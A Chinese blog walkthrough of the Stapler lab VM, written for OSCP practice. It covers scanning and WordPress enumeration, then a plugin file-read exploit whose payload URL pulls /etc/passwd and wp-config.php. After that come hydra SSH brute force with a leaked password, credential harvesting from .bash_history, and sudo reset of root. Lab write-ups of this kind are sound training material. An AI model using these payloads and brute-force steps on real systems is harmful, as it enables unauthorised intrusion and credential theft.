首页 > 其他分享 >OSCP(提高篇靶机Stapler)

OSCP(提高篇靶机Stapler)

时间:2023-12-01 12:23:07浏览次数:30  
标签:Stapler 107.143 192.168 12380 https wp 靶机 root OSCP

第一步:netdiscover

第二步:nmap

 

 

 第三步:存在20/21ftp服务,先尝试一下匿名访问,看看有无有用信息(anonymous)

 第四步,发现只是闲聊信息,下面看一下12380的web服务,并进行目录扫描,查看泄露目录robots.txt

dirb https://192.168.107.143:12380   当然这里也可以使用:nikto -h 192.168.107.143:12380  nikto详细用法:https://blog.csdn.net/smli_ng/article/details/105994754

 

 

 第五步:发现存在wp框架,使用wpscan进行扫描,wp框架存在大量模块漏洞,(WPScan使用完整攻略:https://www.freebuf.com/sectool/174663.html)

 

 存在疑似uploads文件上传接口,plugins模块[DIR] advanced-video-embed-embed-videos-or-playlists

 

 第六步:插件 Advanced Video Embed,我们检查了 searchsploit。果然,看起来这个插件有一个可利用的漏洞。

 /usr/share/exploitdb/exploits/php/webapps/39646.py

http://127.0.0.1/wordpress/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=[FILEPATH]
https://192.168.107.143:12380/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=/etc/passwd

 因为当我导航到这个 url 时,它是一个断开的链接

https://192.168.107.135:12380/blogblog/?p=210
最后我意识到,每次运行它时,该漏洞都会创建一个新的博客条目。该博客条目的标题为 jpeg。
https://192.168.107.135:12380/blogblog/
查看 wp-content/uploads 目录

wget --no-check-certificate https://192.168.107.143:12380/blogblog/wp-content/uploads/864820861.jpeg

cat 864820861.jpeg | grep /bin/bash | cut -d ":" -f1
通过 grepping /bin/bash 然后剪切,我可以获得为 shell 配置的用户(以后可用hydra暴力破解)

 第七步:然后我们尝试获得wp-config.php文件(wp配置文件)    ../wp-config.php

wget --no-check-certificate https://192.168.107.143:12380/blogblog/wp-content/uploads/1462524421.jpeg  然后cat查看

 第七步:获取shell还有root权限(方式1:通过获取的数据库密码,敏感信息hydra暴力获得用户,进入各用户目录查看命令执行记录获取满权限用户重置root密码)

有个密码:plbkac

hydra ssh://192.168.107.143 -L users.txt -p plbkac

 ssh [email protected]

 cd /home放的是所有用户的信息

看起来在用户 JKanode 的主目录中,他们有一个 .bash_history 文件,其中包含一些密码信息。我尝试了这两个帐户,实际上这两个密码都可以让您登录。
几乎所有用户都有.bash_history

 ssh [email protected]

 peter用户具有所有权限,可直接重置root密码sudo passwd root

 

第八步:获取shell还有root权限(方式2:)

 由获取到的数据库root密码,以及目录扫描得出的phpMyAdmin目录,进行登录而后利用mysql OUTFILE上传文件

 

标签:Stapler,107.143,192.168,12380,https,wp,靶机,root,OSCP
From: https://www.cnblogs.com/justdoIT20680/p/17869430.html

相关文章

  • OSCP(基础篇靶机Kioptrix Level 2)
    第一步:netdiscover加nmap 第二步:通过burpsuite,利用SQLiPayloads进行SQL注入SQLiPayloads:'-''''&''^''*''or''-''or''''or''&''or'&#......
  • OSCP(基础篇靶机Kioptrix Level 1)
    第一步:netdiscover-ieth0 第二步:nmap 第三步:139samba高危服务,先看看是啥版本,利用msfmsfconsoleuseauxiliary/scanner/smb/smb_version 第四步:Samba<2.2.8(Linux/BSD)-RemoteCodeExecution存在远程代码执行漏洞kali查看某个系统的漏洞工具:msfconsole->sear......
  • Vulnhub DomDom-1(靶机玩乐2023-11-30)
    靶机下载地址:https://www.vulnhub.com/entry/domdom-1,328/第一步:扫一下同网段接口IP: 第二步:nmap扫描版本端口详细信息并输出  第三步:访问80端口服务 第四步:简单做做dirb目录遍历,也可以安装gobuster等做目录扫描:https://blog.csdn.net/qq_22597955/article/details......
  • 【Sword系列】Vulnhub靶机Bob_v1.0.1 writeup
    个人博客地址:  http://www.sword-blogs.com/下载地址:https://www.vulnhub.com/entry/bob-101,226/信息搜集扫描IP地址扫描端口及端口信息访问80端口并没有发现有用的信息扫描目录看到有熟悉的robots.txt,访问看一下发现了dev_shell.php,可以执行一些简单的命令,但是不......
  • Metasploitable-Linux靶机配置
    Metasploitable和kali是课上下载好的。直接打开进入欢迎界面用默认账号登录了之后,修改root密码(sudopasswdroot),登录root账号,查看本机IP(ifconfig)切换到kali,把kali的IP改为192.168.72.129,且能ping通192.168.72.131在kali的浏览器中输入靶机的IP,可以看到靶机的界面......
  • 靶机Scriptkiddie Funbox11 学习总结
    一、信息收集:1、扫描ARP信息:└─#arp-scan–l2、使用nmap扫描端口,-sC使用默认脚本进行漏洞扫描:└─#nmap-sC-sV-oAnmap/funbox192.168.2.23再扫描一下版本:通过上面的信息可以看到:(1)  系统为ubuntu,但是具体的版本不确定(2)  系统开放了21端口,运行的软件为proftpd,版......
  • 【vulnhub】——DC-9靶机
    【vulnhub】——DC-9靶机1.主机发现扫描kali主机C段(Kali和DC-9主机在同一个网关下):发现主机为192.168.108.146,进行详细端口扫描:可以看到靶机开了一个ssh和http服务。可以使用ssh弱密码爆破,但是可以看到22端口的状态是filter,这里先看web部分。2.SQL注入打开相应网页可以......
  • msf扫描靶机上mysql服务的空密码
    我们启动一台Metasploitable2-Linux靶机网络模式为桥接IP:192.168.146.136 登录 Metasploitable2-Linux 系统用户名 root,密码:123456 输入 ipa 查看 ip 地址 登录Kali开始搜索模块msf6>searchmysql_login加载模块msf6>useauxiliary/scanner/mysql/......
  • kali渗透win7靶机练习
    1.准备项目:装有kalilinux的虚拟机win7靶机2.查看一下kali和win7的ip:kali的IP为:192.168.164.129win7靶机的ip为:192.168.164.1873.将kali切换成root模式:4.用kali去ping一下win7靶机:如果ping不动,就要在win7里关掉防火墙(省略)5.启动Metasploit专用的数据库:msfc......
  • Vulnhub:Kira: CTF靶机
    kali:192.168.111.111靶机:192.168.111.238信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.238访问80端口点击upload发现是个上传点点击language发现存在文件包含上传php图片马再利用文件包含反弹shellhttp://192.168.111.238/languag......